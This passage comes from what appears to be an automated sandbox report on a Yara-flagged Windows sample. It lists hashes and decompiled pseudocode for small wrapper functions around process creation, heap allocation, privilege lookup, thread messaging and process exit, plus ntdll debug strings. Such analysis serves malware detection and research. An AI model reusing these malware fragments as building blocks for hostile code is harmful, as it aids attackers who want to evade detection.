                                                                                                            • Instruction ID: b6af3f1361b8eda67e540867a7bd53bdb9143e8686efc2481cc801b9ac8b9ecb
                                                                                                            • Opcode Fuzzy Hash: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
                                                                                                            • Instruction Fuzzy Hash: B490027220101802D2807159540464A0045D7D1351FA1C069A4055654DCA558A6AB7E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                                                                            • Instruction ID: 637c905627b5bb4a03c2226a37a8300c2a4b60c797d9970faddbf042d321cc0a
                                                                                                            • Opcode Fuzzy Hash: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                                                                            • Instruction Fuzzy Hash: 1C90026221181042D30065695C14B070045D7D0353F61C169A4184554CC9558872A561
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                                                                            • Instruction ID: ac975c46d5e0f7df8dca8235b86e792b2019ac7a740ae201914cac43a2613f33
                                                                                                            • Opcode Fuzzy Hash: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                                                                            • Instruction Fuzzy Hash: D790026230101003D240715964186064045E7E1351F61D065E4444554CD9558867A262
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                                                                            • Instruction ID: 97e9607d85c17da569d1c092a390032d692dd22a69bd0343887823db342f2310
                                                                                                            • Opcode Fuzzy Hash: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                                                                            • Instruction Fuzzy Hash: 0390026A21301002D2807159640860A0045D7D1352FA1D469A4045558CC955887AA361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                                                                            • Instruction ID: 2f8e6501a8a7b22a223eba541d5298fd9ac55c90513cff6baae47b73a8a1c18b
                                                                                                            • Opcode Fuzzy Hash: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                                                                            • Instruction Fuzzy Hash: A890027231115402D210615994047060045D7D1351F61C465A4854558D86D588A2B162
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                                                                            • Instruction ID: 0a2e84f53e5d998816a2311ce4ee6503d69d22ba64237bff680257d2f5628551
                                                                                                            • Opcode Fuzzy Hash: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                                                                            • Instruction Fuzzy Hash: 2990027220101402D200659964086460045D7E0351F61D065A9054555EC6A588A2B171
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                            • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                            • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                            • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418550, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00418550(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0x58de852
				_t3 = _t16 + 0xc80; // 0x408909
				_t34 = _t3;
				E00418DD0(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t5 =  &_a48; // 0x407c45
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
				return _t22;
			}






                                                                                                            0x00418553
                                                                                                            0x00418556
                                                                                                            0x00418562
                                                                                                            0x00418562
                                                                                                            0x0041856a
                                                                                                            0x00418572
                                                                                                            0x004185a4
                                                                                                            0x004185a8

                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID: E|@D
                                                                                                            • API String ID: 2186235152-1370303659
                                                                                                            • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                            • Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
                                                                                                            • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                            • Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                            0x004184b7
                                                                                                            0x004184c2
                                                                                                            0x004184cd
                                                                                                            0x004184d1

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID: &5A
                                                                                                            • API String ID: 1279760036-1617645808
                                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                            • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                            • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}












                                                                                                            0x00407270
                                                                                                            0x0040727f
                                                                                                            0x00407283
                                                                                                            0x0040728e
                                                                                                            0x0040729e
                                                                                                            0x004072ae
                                                                                                            0x004072b3
                                                                                                            0x004072ba
                                                                                                            0x004072bd
                                                                                                            0x004072ca
                                                                                                            0x004072cc
                                                                                                            0x004072ce
                                                                                                            0x004072ed
                                                                                                            0x00000000
                                                                                                            0x004072ed
                                                                                                            0x004072eb
                                                                                                            0x00000000
                                                                                                            0x004072eb
                                                                                                            0x004072f2

                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                            • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                            • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                            • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184D2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E004184D2(signed int* __ecx, signed int __edx, signed int __edi, intOrPtr __fp0, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t14;
				void* _t29;

				asm("out dx, al");
				asm("lahf");
				gs =  *((intOrPtr*)(_t29 + 0x3d + __edi * 4));
				 *((intOrPtr*)(__ecx - 0x30)) = __fp0;
				 *__ecx =  *__ecx & __edx;
				_push(0x8bec8b55);
				_t11 = _v0;
				_t7 = _t11 + 0xc74; // 0xc74
				E00418DD0(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}






                                                                                                            0x004184d2
                                                                                                            0x004184d3
                                                                                                            0x004184d4
                                                                                                            0x004184d8
                                                                                                            0x004184dd
                                                                                                            0x004184df
                                                                                                            0x004184e3
                                                                                                            0x004184ef
                                                                                                            0x004184f7
                                                                                                            0x0041850d
                                                                                                            0x00418511

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 1e385673162a2dec4d0b89e02d5cdb996c04fa7434ec81a1559e1a0755a5c315
                                                                                                            • Instruction ID: 6779f3412cf1ea62c4e4a45f5f4d75c74c39be4ea27dbf5a0490146149385879
                                                                                                            • Opcode Fuzzy Hash: 1e385673162a2dec4d0b89e02d5cdb996c04fa7434ec81a1559e1a0755a5c315
                                                                                                            • Instruction Fuzzy Hash: A5E022B82142459FD714EF29E8808AB7390FFD1348B144A8EE88847306C231C429CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                            0x004184ef
                                                                                                            0x004184f7
                                                                                                            0x0041850d
                                                                                                            0x00418511

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                            • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                            • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                            0x0041865a
                                                                                                            0x00418670
                                                                                                            0x00418674

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                            • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                            • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00418512() {
				signed char _t13;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t20;

				asm("pushad");
				_pop(_t16);
				asm("fisubr word [eax+ecx*2+0x11]");
				asm("int 0xc0");
				 *(_t18 - 0x75) =  *(_t18 - 0x75) & _t13;
				_push(_t18);
				_t19 = _t20;
				_t9 =  *((intOrPtr*)(_t19 + 8));
				E00418DD0(_t15,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 8)) + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t19 + 0xc));
			}








                                                                                                            0x00418512
                                                                                                            0x00418518
                                                                                                            0x00418519
                                                                                                            0x0041851d
                                                                                                            0x0041851f
                                                                                                            0x00418520
                                                                                                            0x00418521
                                                                                                            0x00418523
                                                                                                            0x0041853a
                                                                                                            0x00418548

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 7c0e386aa062e71b480d8ff46bb97002ac1e566c78b8ad649ab6ba5af2f5d55f
                                                                                                            • Instruction ID: 335d762f6bb65cfd72260c62db0d921a475f7b30953b8f3697169f18a9742925
                                                                                                            • Opcode Fuzzy Hash: 7c0e386aa062e71b480d8ff46bb97002ac1e566c78b8ad649ab6ba5af2f5d55f
                                                                                                            • Instruction Fuzzy Hash: 35E0DF715042006EC720DF78CC85EC73F689F14750F06819CB909AB282D970D600CA90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                            0x00418523
                                                                                                            0x0041853a
                                                                                                            0x00418548

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                            • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                            • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                                                                            • Instruction ID: 0c3215f39203223c24339349c43f41ea1b481762c0b720e6d1b8de0bdd65cf9e
                                                                                                            • Opcode Fuzzy Hash: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                                                                            • Instruction Fuzzy Hash: 68B09B729015D5C5D711D76056087177940F7D0751F76C0A5D2060641A4778C4D1F5B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00B8B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B8B53F
                                                                                                            • an invalid address, %p, xrefs: 00B8B4CF
                                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B8B38F
                                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B8B3D6
                                                                                                            • a NULL pointer, xrefs: 00B8B4E0
                                                                                                            • This failed because of error %Ix., xrefs: 00B8B446
                                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B8B484
                                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 00B8B352
                                                                                                            • The instruction at %p referenced memory at %p., xrefs: 00B8B432
                                                                                                            • *** enter .exr %p for the exception record, xrefs: 00B8B4F1
                                                                                                            • The critical section is owned by thread %p., xrefs: 00B8B3B9
                                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B8B2DC
                                                                                                            • *** Inpage error in %ws:%s, xrefs: 00B8B418
                                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B8B47D
                                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 00B8B48F
                                                                                                            • write to, xrefs: 00B8B4A6
                                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B8B305
                                                                                                            • *** then kb to get the faulting stack, xrefs: 00B8B51C
                                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B8B39B
                                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B8B2F3
                                                                                                            • The instruction at %p tried to %s , xrefs: 00B8B4B6
                                                                                                            • Go determine why that thread has not released the critical section., xrefs: 00B8B3C5
                                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B8B314
                                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B8B323
                                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B8B476
                                                                                                            • The resource is owned shared by %d threads, xrefs: 00B8B37E
                                                                                                            • read from, xrefs: 00B8B4AD, 00B8B4B2
                                                                                                            • <unknown>, xrefs: 00B8B27E, 00B8B2D1, 00B8B350, 00B8B399, 00B8B417, 00B8B48E
                                                                                                            • *** enter .cxr %p for the context, xrefs: 00B8B50D
                                                                                                            • The resource is owned exclusively by thread %p, xrefs: 00B8B374
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                            • API String ID: 0-108210295
                                                                                                            • Opcode ID: 0bc21e6f3af9fee8ac22e20dfc929963c8f12468e6a290acac207eecca6d8ff3
                                                                                                            • Instruction ID: e565b414de7ce34ee9700444359e295c87e9090b064e2b072f3973bfadf6bfe7
                                                                                                            • Opcode Fuzzy Hash: 0bc21e6f3af9fee8ac22e20dfc929963c8f12468e6a290acac207eecca6d8ff3
                                                                                                            • Instruction Fuzzy Hash: 43810375A40210FFCB21BA258C96E7B3BA5FF56B51F0640D8F0042B263D3658D61DBB2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B91C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00B91C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xab48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ADB150();
				} else {
					E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xbc589c);
				E00ADB150("Heap error detected at %p (heap handle %p)\n",  *0xbc58a0);
				_t27 =  *0xbc5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B91E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ADB150();
				} else {
					E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00ADB150("Error code: %d - %s\n",  *0xbc5898);
				_t113 =  *0xbc58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ADB150();
					} else {
						E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
